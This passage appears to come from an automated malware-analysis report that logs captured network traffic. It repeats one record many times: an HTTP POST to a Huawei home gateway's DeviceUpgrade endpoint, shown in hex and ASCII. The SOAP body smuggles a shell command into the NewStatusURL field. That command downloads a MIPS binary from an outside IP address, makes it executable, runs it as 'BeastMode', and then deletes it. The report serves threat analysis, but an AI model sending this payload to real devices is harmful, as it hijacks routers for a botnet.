65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 